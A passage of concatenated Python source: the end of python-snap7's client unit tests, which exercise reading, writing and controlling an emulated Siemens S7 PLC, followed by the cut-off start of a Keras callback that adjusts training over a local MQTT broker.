data_items[1].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[1].Result = ctypes.c_int32(0)
data_items[1].DBNumber = ctypes.c_int32(db)
data_items[1].Start = ctypes.c_int32(4)
data_items[1].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[2].Area = ctypes.c_int32(S7AreaDB)
data_items[2].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[2].Result = ctypes.c_int32(0)
data_items[2].DBNumber = ctypes.c_int32(db)
data_items[2].Start = ctypes.c_int32(8)
data_items[2].Amount = ctypes.c_int32(2) # reading an INT, 2 bytes
# create buffers to receive the data
# use the Amount attribute on each item to size the buffer
for di in data_items:
# create the buffer
dataBuffer = ctypes.create_string_buffer(di.Amount)
# get a pointer to the buffer
pBuffer = ctypes.cast(ctypes.pointer(dataBuffer),
ctypes.POINTER(ctypes.c_uint8))
di.pData = pBuffer
result, data_items = self.client.read_multi_vars(data_items)
result_values = []
# function to cast bytes to match data_types[] above
byte_to_value = [util.get_real, util.get_real, util.get_int]
# unpack and test the result of each read
for i in range(len(data_items)):
btv = byte_to_value[i]
di = data_items[i]
value = btv(di.pData, 0)
result_values.append(value)
self.assertEqual(result_values[0], test_values[0])
self.assertEqual(result_values[1], test_values[1])
self.assertEqual(result_values[2], test_values[2])
def test_upload(self):
"""
this raises an exception due to missing authorization? maybe not
implemented in server emulator
"""
self.assertRaises(Snap7Exception, self.client.upload, db_number)
def test_as_upload(self):
_buffer = buffer_type()
size = ctypes.c_int(ctypes.sizeof(_buffer))
self.client.as_upload(1, _buffer, size)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
@unittest.skip("TODO: invalid block size")
def test_download(self):
data = bytearray(1024)
self.client.download(block_num=db_number, data=data)
def test_read_area(self):
amount = 1
start = 1
# Test read_area with a DB
area = Areas.DB
dbnumber = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
# Test read_area with a TM
area = Areas.TM
dbnumber = 0
data = bytearray(b'\x12\x34')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
# Test read_area with a CT
area = Areas.CT
dbnumber = 0
data = bytearray(b'\x13\x35')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
def test_write_area(self):
# Test write area with a DB
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(data, bytearray(res))
# Test write area with a TM
area = Areas.TM
dbnumber = 0
size = 2
timer = bytearray(b'\x12\x00')
res = self.client.write_area(area, dbnumber, start, timer)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
# Test write area with a CT
area = Areas.CT
dbnumber = 0
size = 2
timer = bytearray(b'\x13\x00')
res = self.client.write_area(area, dbnumber, start, timer)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
def test_list_blocks(self):
blockList = self.client.list_blocks()
def test_list_blocks_of_type(self):
self.client.list_blocks_of_type('DB', 10)
self.assertRaises(Snap7Exception, self.client.list_blocks_of_type, 'NOblocktype', 10)
def test_get_block_info(self):
"""test Cli_GetAgBlockInfo"""
self.client.get_block_info('DB', 1)
self.assertRaises(Exception, self.client.get_block_info,
'NOblocktype', 10)
self.assertRaises(Exception, self.client.get_block_info, 'DB', 10)
def test_get_cpu_state(self):
"""this tests the get_cpu_state function"""
self.client.get_cpu_state()
def test_set_session_password(self):
password = 'abcdefgh'
self.client.set_session_password(password)
def test_clear_session_password(self):
self.client.clear_session_password()
def test_set_connection_params(self):
self.client.set_connection_params("10.0.0.2", 10, 10)
def test_set_connection_type(self):
self.client.set_connection_type(1)
self.client.set_connection_type(2)
self.client.set_connection_type(3)
self.client.set_connection_type(20)
def test_get_connected(self):
self.client.get_connected()
def test_ab_read(self):
start = 1
size = 1
data = bytearray(size)
self.client.ab_write(start=start, data=data)
self.client.ab_read(start=start, size=size)
def test_ab_write(self):
start = 1
size = 10
data = bytearray(size)
result = self.client.ab_write(start=start, data=data)
self.assertEqual(0, result)
def test_as_ab_read(self):
expected = b'\x10\x01'
self.client.ab_write(0, bytearray(expected))
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 2)()
self.client.as_ab_read(0, 2, buffer)
result = self.client.wait_as_completion(500)
self.assertEqual(0, result)
self.assertEqual(expected, bytearray(buffer))
def test_as_ab_write(self):
data = b'\x01\x11'
response = self.client.as_ab_write(0, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.ab_read(0, 2))
def test_compress(self):
time_ = 1000
self.client.compress(time_)
def test_as_compress(self):
time_ = 1000
response = self.client.as_compress(time_)
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
def test_set_param(self):
values = (
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.types.RemotePort, tcpport),
(snap7.types.PingTimeout, 750),
(snap7.types.SendTimeout, 10),
(snap7.types.RecvTimeout, 3000),
(snap7.types.SrcRef, 256),
(snap7.types.DstRef, 0),
(snap7.types.SrcTSap, 256),
(snap7.types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
snap7.types.KeepAliveTime)
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
def test_as_copy_ram_to_rom(self):
self.client.copy_ram_to_rom(timeout=1)
def test_as_ct_read(self):
# Cli_AsCTRead
expected = b'\x10\x01'
self.client.ct_write(0, 1, bytearray(expected))
type_ = snap7.types.wordlen_to_ctypes[WordLen.Counter.value]
buffer = (type_ * 1)()
self.client.as_ct_read(0, 1, buffer)
self.client.wait_as_completion(500)
self.assertEqual(expected, bytearray(buffer))
def test_as_ct_write(self):
# Cli_CTWrite
data = b'\x01\x11'
response = self.client.as_ct_write(0, 1, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.ct_read(0, 1))
def test_as_db_fill(self):
filler = 31
expected = bytearray(filler.to_bytes(1, byteorder='big') * 100)
response = self.client.db_fill(1, filler)
result = self.client.wait_as_completion(500)
self.assertEqual(expected, self.client.db_read(1, 0, 100))
def test_as_db_get(self):
_buffer = buffer_type()
size = ctypes.c_int(buffer_size)
self.client.as_db_get(db_number, _buffer, size)
self.client.wait_as_completion(500)
result = bytearray(_buffer)[:size.value]
self.assertEqual(100, len(result))
def test_as_db_read(self):
size = 40
start = 0
db = 1
expected = bytearray(40)
self.client.db_write(db_number=db, start=start, data=expected)
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
data = (type_ * size)()
self.client.as_db_read(db, start, size, data)
self.client.wait_as_completion(500)
self.assertEqual(data, expected)
def test_as_db_write(self):
size = 40
data = bytearray(size)
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
size = len(data)
result = (type_ * size).from_buffer_copy(data)
self.client.as_db_write(db_number=1, start=0, size=size, data=result)
self.client.wait_as_completion(500)
self.assertEqual(data, result)
@unittest.skip("TODO: not yet fully implemented")
def test_as_download(self):
data = bytearray(128)
self.client.as_download(block_num=-1, data=data)
def test_plc_stop(self):
self.client.plc_stop()
def test_plc_hot_start(self):
self.client.plc_hot_start()
def test_plc_cold_start(self):
self.client.plc_cold_start()
def test_get_pdu_length(self):
pduRequested = self.client.get_param(10)
pduSize = self.client.get_pdu_length()
self.assertEqual(pduSize, pduRequested)
def test_get_cpu_info(self):
expected = (
('ModuleTypeName', 'CPU 315-2 PN/DP'),
('SerialNumber', 'S C-C2UR28922012'),
('ASName', 'SNAP7-SERVER'),
('Copyright', 'Original Siemens Equipment'),
('ModuleName', 'CPU 315-2 PN/DP')
)
cpuInfo = self.client.get_cpu_info()
for param, value in expected:
self.assertEqual(getattr(cpuInfo, param).decode('utf-8'), value)
def test_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_DBWrite
self.client._library.Cli_DBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_DBWrite = original
def test_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client._library.Cli_Download
self.client._library.Cli_Download = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.download(block_num=db_number, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_Download = original
def test_write_area_with_byte_literal_does_not_throw(self):
mock_writearea = mock.MagicMock()
mock_writearea.return_value = None
original = self.client._library.Cli_WriteArea
self.client._library.Cli_WriteArea = mock_writearea
area = Areas.DB
dbnumber = 1
size = 4
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.write_area(area, dbnumber, start, bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_WriteArea = original
def test_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_ABWrite
self.client._library.Cli_ABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.ab_write(start=start, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_ABWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_AsABWrite
self.client._library.Cli_AsABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_ab_write(start=start, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsABWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_AsDBWrite
self.client._library.Cli_AsDBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsDBWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client._library.Cli_AsDownload
self.client._library.Cli_AsDownload = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_download(block_num=db_number, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsDownload = original
def test_get_plc_time(self):
self.assertAlmostEqual(datetime.now().replace(microsecond=0), self.client.get_plc_datetime(), delta=timedelta(seconds=1))
def test_set_plc_datetime(self):
new_dt = datetime(2011, 1, 1, 1, 1, 1, 0)
self.client.set_plc_datetime(new_dt)
# Can't actual set datetime in emulated PLC, get_plc_datetime always returns system time.
# self.assertEqual(new_dt, self.client.get_plc_datetime())
def test_wait_as_completion_pass(self, timeout=1000):
# Cli_WaitAsCompletion
# prepare Server with values
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
self.client.write_area(area, dbnumber, start, data)
# start as_request and test
wordlen, usrdata = self.client._prepare_as_read_area(area, size)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, size, wordlen, pusrdata)
self.client.wait_as_completion(timeout)
self.assertEqual(bytearray(usrdata), data)
def test_wait_as_completion_timeouted(self, timeout=0, tries=500):
# Cli_WaitAsCompletion
# prepare Server
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
wordlen, data = self.client._prepare_as_read_area(area, size)
pdata = ctypes.byref(data)
self.client.write_area(area, dbnumber, start, bytearray(data))
# start as_request and wait for zero seconds to try trigger timeout
for i in range(tries):
res = self.client.as_read_area(area, dbnumber, start, size, wordlen, pdata)
res2 = None
try:
res2 = self.client.wait_as_completion(timeout)
check_error(res2)
except Snap7Exception as s7_err:
if not s7_err.args[0] == b'CLI : Job Timeout':
self.fail(f"While waiting another error appeared: {s7_err}")
return
except BaseException:
self.fail(f"While waiting another error appeared:>>>>>>>> {res2}")
self.fail(f"After {tries} tries, no timout could be envoked by snap7. Either tests are passing to fast or"
f"a problem is existing in the method. Fail test.")
def test_check_as_completion(self, timeout=5):
# Cli_CheckAsCompletion
check_status = ctypes.c_int(-1)
pending_checked = False
# preparing Server values
data = bytearray(b'\x01\xFF')
size = len(data)
area = Areas.DB
db = 1
start = 1
self.client.write_area(area, db, start, data)
# start as_request and test
wordlen, cdata = self.client._prepare_as_read_area(area, size)
pcdata = ctypes.byref(cdata)
res = self.client.as_read_area(area, db, start, size, wordlen, pcdata)
for i in range(10):
self.client.check_as_completion(ctypes.byref(check_status))
if check_status.value == 0:
self.assertEqual(data, bytearray(cdata))
break
pending_checked = True
time.sleep(1)
else:
self.fail(f"TimeoutError - Process pends for more than {timeout} seconds")
if pending_checked is False:
logging.warning("Pending was never reached, because Server was to fast,"
" but request to server was successfull.")
def test_as_read_area(self):
amount = 1
start = 1
# Test read_area with a DB
area = Areas.DB
dbnumber = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
# Test read_area with a TM
area = Areas.TM
dbnumber = 0
data = bytearray(b'\x12\x34')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
# Test read_area with a CT
area = Areas.CT
dbnumber = 0
data = bytearray(b'\x13\x35')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
def test_as_write_area(self):
# Test write area with a DB
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(b'\x11')
wordlen, cdata = self.client._prepare_as_write_area(area, data)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(data, bytearray(res))
# Test write area with a TM
area = Areas.TM
dbnumber = 0
size = 2
timer = bytearray(b'\x12\x00')
wordlen, cdata = self.client._prepare_as_write_area(area, timer)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
# Test write area with a CT
area = Areas.CT
dbnumber = 0
size = 2
timer = bytearray(b'\x13\x00')
wordlen, cdata = self.client._prepare_as_write_area(area, timer)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
def test_as_eb_read(self):
# Cli_AsEBRead
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 1)()
response = self.client.as_eb_read(0, 1, buffer)
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_eb_write(self):
# Cli_AsEBWrite
response = self.client.as_eb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_full_upload(self):
# Cli_AsFullUpload
response = self.client.as_full_upload('DB', 1)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_list_blocks_of_type(self):
data = (ctypes.c_uint16 * 10)()
count = ctypes.c_int()
self.client.as_list_blocks_of_type('DB', data, count)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_mb_read(self):
# Cli_AsMBRead
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
data = (type_ * 1)()
self.client.as_mb_read(0, 1, data)
result = bytearray(data)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_mb_write(self):
# Cli_AsMBWrite
response = self.client.as_mb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_read_szl(self):
# Cli_AsReadSZL
expected = b'S C-C2UR28922012\x00\x00\x00\x00\x00\x00\x00\x00'
ssl_id = 0x011c
index = 0x0005
s7_szl = S7SZL()
size = ctypes.c_int(ctypes.sizeof(s7_szl))
self.client.as_read_szl(ssl_id, index, s7_szl, size)
self.client.wait_as_completion(100)
result = bytes(s7_szl.Data)[2:26]
self.assertEqual(expected, result)
def test_as_read_szl_list(self):
# Cli_AsReadSZLList
expected = b'\x00\x00\x00\x0f\x02\x00\x11\x00\x11\x01\x11\x0f\x12\x00\x12\x01'
szl_list = S7SZLList()
items_count = ctypes.c_int(ctypes.sizeof(szl_list))
self.client.as_read_szl_list(szl_list, items_count)
self.client.wait_as_completion(500)
result = bytearray(szl_list.List)[:16]
self.assertEqual(expected, result)
def test_as_tm_read(self):
# Cli_AsMBRead
expected = b'\x10\x01'
wordlen = WordLen.Timer
self.client.tm_write(0, 1, bytearray(expected))
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 1)()
self.client.as_tm_read(0, 1, buffer)
self.client.wait_as_completion(500)
self.assertEqual(expected, bytearray(buffer))
def test_as_tm_write(self):
# Cli_AsMBWrite
data = b'\x10\x01'
response = self.client.as_tm_write(0, 1, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.tm_read(0, 1))
def test_copy_ram_to_rom(self):
# Cli_CopyRamToRom
self.assertEqual(0, self.client.copy_ram_to_rom(timeout=1))
def test_ct_read(self):
# Cli_CTRead
data = b'\x10\x01'
self.client.ct_write(0, 1, bytearray(data))
result = self.client.ct_read(0, 1)
self.assertEqual(data, result)
def test_ct_write(self):
# Cli_CTWrite
data = b'\x01\x11'
self.assertEqual(0, self.client.ct_write(0, 1, bytearray(data)))
self.assertRaises(ValueError, self.client.ct_write, 0, 2, bytes(1))
def test_db_fill(self):
# Cli_DBFill
filler = 31
expected = bytearray(filler.to_bytes(1, byteorder='big') * 100)
self.client.db_fill(1, filler)
self.assertEqual(expected, self.client.db_read(1, 0, 100))
def test_eb_read(self):
# Cli_EBRead
self.client._library.Cli_EBRead = mock.Mock(return_value=0)
response = self.client.eb_read(0, 1)
self.assertTrue(isinstance(response, bytearray))
self.assertEqual(1, len(response))
def test_eb_write(self):
# Cli_EBWrite
self.client._library.Cli_EBWrite = mock.Mock(return_value=0)
response = self.client.eb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
def test_error_text(self):
# Cli_ErrorText
CPU_INVALID_PASSWORD = 0x01E00000
CPU_INVLID_VALUE = 0x00D00000
CANNOT_CHANGE_PARAM = 0x02600000
self.assertEqual('CPU : Invalid password', self.client.error_text(CPU_INVALID_PASSWORD))
self.assertEqual('CPU : Invalid value supplied', self.client.error_text(CPU_INVLID_VALUE))
self.assertEqual('CLI : Cannot change this param now', self.client.error_text(CANNOT_CHANGE_PARAM))
def test_get_cp_info(self):
# Cli_GetCpInfo
result = self.client.get_cp_info()
self.assertEqual(2048, result.MaxPduLength)
self.assertEqual(0, result.MaxConnections)
self.assertEqual(1024, result.MaxMpiRate)
self.assertEqual(0, result.MaxBusRate)
def test_get_exec_time(self):
# Cli_GetExecTime
response = self.client.get_exec_time()
self.assertTrue(isinstance(response, int))
def test_get_last_error(self):
# Cli_GetLastError
self.assertEqual(0, self.client.get_last_error())
def test_get_order_code(self):
# Cli_GetOrderCode
expected = b'6ES7 315-2EH14-0AB0 '
result = self.client.get_order_code()
self.assertEqual(expected, result.OrderCode)
def test_get_protection(self):
# Cli_GetProtection
result = self.client.get_protection()
self.assertEqual(1, result.sch_schal)
self.assertEqual(0, result.sch_par)
self.assertEqual(1, result.sch_rel)
self.assertEqual(2, result.bart_sch)
self.assertEqual(0, result.anl_sch)
def test_get_pg_block_info(self):
valid_db_block = b'pp\x01\x01\x05\n\x00c\x00\x00\x00t\x00\x00\x00\x00\x01\x8d\xbe)2\xa1\x01' \
b'\x85V\x1f2\xa1\x00*\x00\x00\x00\x00\x00\x02\x01\x0f\x05c\x00#\x00\x00\x00' \
b'\x11\x04\x10\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01' \
b'\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
block_info = self.client.get_pg_block_info(bytearray(valid_db_block))
self.assertEqual(10, block_info.BlkType)
self.assertEqual(99, block_info.BlkNumber)
self.assertEqual(2752512, block_info.SBBLength)
self.assertEqual(bytes((util.utc2local(date(2019, 6, 27)).strftime("%Y/%m/%d")), encoding="utf-8"), block_info.CodeDate)
self.assertEqual(bytes((util.utc2local(date(2019, 6, 27)).strftime("%Y/%m/%d")), encoding="utf-8"), block_info.IntfDate)
def test_iso_exchange_buffer(self):
# Cli_IsoExchangeBuffer
self.client.db_write(1, 0, bytearray(b'\x11'))
# PDU read DB1 1.0 BYTE
data = b'\x32\x01\x00\x00\x01\x00\x00\x0e\x00\x00\x04\x01\x12\x0a\x10\x02\x00\x01\x00\x01\x84\x00\x00\x00'
# PDU response
expected = bytearray(b'2\x03\x00\x00\x01\x00\x00\x02\x00\x05\x00\x00\x04\x01\xff\x04\x00\x08\x11')
self.assertEqual(expected, self.client.iso_exchange_buffer(bytearray(data)))
def test_mb_read(self):
# Cli_MBRead
self.client._library.Cli_MBRead = mock.Mock(return_value=0)
response = self.client.mb_read(0, 10)
self.assertTrue(isinstance(response, bytearray))
self.assertEqual(10, len(response))
def test_mb_write(self):
# Cli_MBWrite
self.client._library.Cli_MBWrite = mock.Mock(return_value=0)
response = self.client.mb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
def test_read_szl(self):
# read_szl_partial_list
expected_number_of_records = 10
expected_length_of_record = 34
ssl_id = 0x001c
response = self.client.read_szl(ssl_id)
self.assertEqual(expected_number_of_records, response.Header.NDR)
self.assertEqual(expected_length_of_record, response.Header.LengthDR)
# read_szl_single_data_record
expected = b'S C-C2UR28922012\x00\x00\x00\x00\x00\x00\x00\x00'
ssl_id = 0x011c
index = 0x0005
response = self.client.read_szl(ssl_id, index)
result = bytes(response.Data)[2:26]
self.assertEqual(expected, result)
# read_szl_order_number
expected = b'6ES7 315-2EH14-0AB0 '
ssl_id = 0x0111
index = 0x0001
response = self.client.read_szl(ssl_id, index)
result = bytes(response.Data[2:22])
self.assertEqual(expected, result)
# read_szl_invalid_id
ssl_id = 0xffff
index = 0xffff
self.assertRaises(Snap7Exception, self.client.read_szl, ssl_id)
self.assertRaises(Snap7Exception, self.client.read_szl, ssl_id, index)
def test_read_szl_list(self):
# Cli_ReadSZLList
expected = b'\x00\x00\x00\x0f\x02\x00\x11\x00\x11\x01\x11\x0f\x12\x00\x12\x01'
result = self.client.read_szl_list()
self.assertEqual(expected, result[:16])
def test_set_plc_system_datetime(self):
# Cli_SetPlcSystemDateTime
self.assertEqual(0, self.client.set_plc_system_datetime())
def test_tm_read(self):
# Cli_TMRead
data = b'\x10\x01'
self.client.tm_write(0, 1, bytearray(data))
result = self.client.tm_read(0, 1)
self.assertEqual(data, result)
def test_tm_write(self):
# Cli_TMWrite
data = b'\x10\x01'
self.assertEqual(0, self.client.tm_write(0, 1, bytearray(data)))
self.assertEqual(data, self.client.tm_read(0, 1))
self.assertRaises(Snap7Exception, self.client.tm_write, 0, 100, bytes(200))
self.assertRaises(ValueError, self.client.tm_write, 0, 2, bytes(2))
def test_write_multi_vars(self):
# Cli_WriteMultiVars
items_count = 3
items = []
areas = [Areas.DB, Areas.CT, Areas.TM]
expected_list = []
for i in range(0, items_count):
item = S7DataItem()
item.Area = ctypes.c_int32(areas[i].value)
wordlen = WordLen.Byte
item.WordLen = ctypes.c_int32(wordlen.value)
item.DBNumber = ctypes.c_int32(1)
item.Start = ctypes.c_int32(0)
item.Amount = ctypes.c_int32(4)
data = (i + 1).to_bytes(1, byteorder='big') * 4
array_class = ctypes.c_uint8 * len(data)
cdata = array_class.from_buffer_copy(data)
item.pData = ctypes.cast(cdata, ctypes.POINTER(array_class)).contents
items.append(item)
expected_list.append(data)
result = self.client.write_multi_vars(items)
self.assertEqual(0, result)
self.assertEqual(expected_list[0], self.client.db_read(db_number=1, start=0, size=4))
self.assertEqual(expected_list[1], self.client.ct_read(0, 2))
self.assertEqual(expected_list[2], self.client.tm_read(0, 2))
@unittest.skipIf(platform.system() == 'Windows', 'Access Violation error')
def test_set_as_callback(self):
expected = b"\x11\x11"
self.callback_counter = 0
cObj = ctypes.cast(ctypes.pointer(ctypes.py_object(self)), S7Object)
def callback(FUsrPtr, JobOp, response):
self = ctypes.cast(FUsrPtr, ctypes.POINTER(ctypes.py_object)).contents.value
self.callback_counter += 1
cfunc_type = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.POINTER(S7Object), ctypes.c_int, ctypes.c_int)
self.client.set_as_callback(cfunc_type(callback), cObj)
self.client.as_ct_write(0, 1, bytearray(expected))
self._as_check_loop()
self.assertEqual(expected, self.client.ct_read(0, 1))
self.assertEqual(1, self.callback_counter)
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.types.RemotePort, 1102),
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
class TestLibraryIntegration(unittest.TestCase):
def setUp(self):
# replace the function load_library with a mock
self.loadlib_patch = mock.patch('snap7.client.load_library')
self.loadlib_func = self.loadlib_patch.start()
# have load_library return another mock
self.mocklib = mock.MagicMock()
self.loadlib_func.return_value = self.mocklib
# have the Cli_Create of the mock return None
self.mocklib.Cli_Create.return_value = None
def tearDown(self):
# restore load_library
self.loadlib_patch.stop()
def test_create(self):
client = snap7.client.Client()
self.mocklib.Cli_Create.assert_called_once()
@mock.patch('snap7.client.byref')
def test_gc(self, byref_mock):
client = snap7.client.Client()
client._pointer = 10
del client
gc.collect()
self.mocklib.Cli_Destroy.assert_called_once()
if __name__ == '__main__':
unittest.main()
|
jukebox_backend.py
|
from tensorflow.keras.callbacks import Callback
from tensorflow.keras import backend as K
import threading, sys, json, os
import numpy as np
import paho.mqtt.client as mqtt
from PyQt5 import QtCore, QtGui, QtWidgets
from keras_jukebox.utils import red_print, green_print, yellow_print, cyan_print
class JukeBoxCallback(Callback):
def __init__(self, verbose=0, host='localhost', port=1883):
super(JukeBoxCallback, self).__init__()
self.verbose = verbose
self.PID = 199 #np.random.randint(0,100)
self.backend_learning_rate = 0
self.frontend_learning_rate = 0
self.frontend_learning_rate_prev = 0
self.host = host
self.port = port
self.client = mqtt.Client()
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.subscribe_topic = 'keras_JukeBox/backend/{}'.format(self.PID)
self.publish_topic = 'keras_JukeBox/frontend/{}'.format(self.PID)
self.msg = None
self.client.connect(host=self.host, port=self.port, keepalive=60, bind_address="")
self.start = False
#TODO make a PID checker
self.client.subscribe(self.subscribe_topic)
self.play_status = 'pause'
self.stopped_from_frontend = False
self.current_epoch = 0
self.current_batch = 0
self.update_learning_rate = False
payload = {'PID':self.PID, 'status': 'not_started'}
self.publish_data(payload)
self.running = False
green_print('called init function')
def start_listening(self):
self.running = True
while self.running:
self.client.loop(timeout=1.0, max_packets=1)
def on_connect(self, client, userdata, flags, rc):
cyan_print("Connected to {} with result code {}".format(self.host,rc))
#send a connection request
#payload = {'PID':self.PID, 'status': 'not_started'}
#self.publish_data(payload)
def publish_data(self, payload=None, qos=0, retain=True):
if isinstance(payload, dict):
payload = json.dumps(payload, indent=2)
self.client.publish(self.publish_topic, payload=payload, qos=qos, retain=retain)
elif payload==None:
self.client.publish(self.publish_topic, payload=payload, qos=1, retain=True)
